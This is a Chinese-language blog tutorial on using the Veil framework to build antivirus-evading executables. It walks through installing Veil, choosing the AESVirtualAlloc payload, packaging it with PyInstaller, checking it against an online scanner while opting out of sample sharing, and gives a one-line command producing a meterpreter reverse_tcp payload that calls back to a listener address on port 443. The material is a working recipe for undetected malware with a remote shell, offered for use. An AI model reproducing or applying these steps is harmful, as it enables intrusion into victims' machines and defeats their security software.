使用veil绕过杀毒软件

git地址:https://github.com/ChrisTruncer/Veil/
# wget https://github.com/ChrisTruncer/Veil/archive/master.zip
# unzip master.zip
# cd Veil-master/setup
# ./setup.sh
# rm -rf setup
运行./Veil
[img]http://dl2.iteye.com/upload/attachment/0103/0734/01b43df9-0370-3d6f-b448-8fa02d8747dc.png[/img]
list命令查看荷载内容
[img]http://dl2.iteye.com/upload/attachment/0103/0736/51571996-ff31-39ac-84f9-711b64e3d2aa.png[/img]
本文使用python/AESVirtualAlloc荷载。
use python/AESVirtualAlloc

[img]http://dl2.iteye.com/upload/attachment/0103/0738/296e2d3c-6373-3106-b9a5-e7260bdf24e5.png[/img]
使用generate命令来生成可执行文件
[img]http://dl2.iteye.com/upload/attachment/0103/0740/f7164fc7-be50-3c63-89e0-5477f9809e1f.png[/img]
选择一些默认值。回答一些关于荷载的问题后,Veil将会提问一些关于你想创建的可执行文件的问题。首先提供一个可执行文件的名字,然后指明用PyInstaller或py2exe来创建可执行文件。
[img]http://dl2.iteye.com/upload/attachment/0103/0742/7c9788b5-6f5c-3a15-a43d-1bb47bdec2a0.png[/img]
选择PyInstaller之后,Veil负责剩下的工作。
[img]http://dl2.iteye.com/upload/attachment/0103/0744/a12f1ff9-e9f9-37f2-b43d-11aeda2c4eba.png[/img]
使用 [url]http://vscan.novirusthanks.org[/url]来检测文件,点击“Do not distribute the sample”
可以使用
./Veil.py -l python -p AESVirtualAlloc -o trytofindthis --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.187.100 LPORT=443
来完成工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值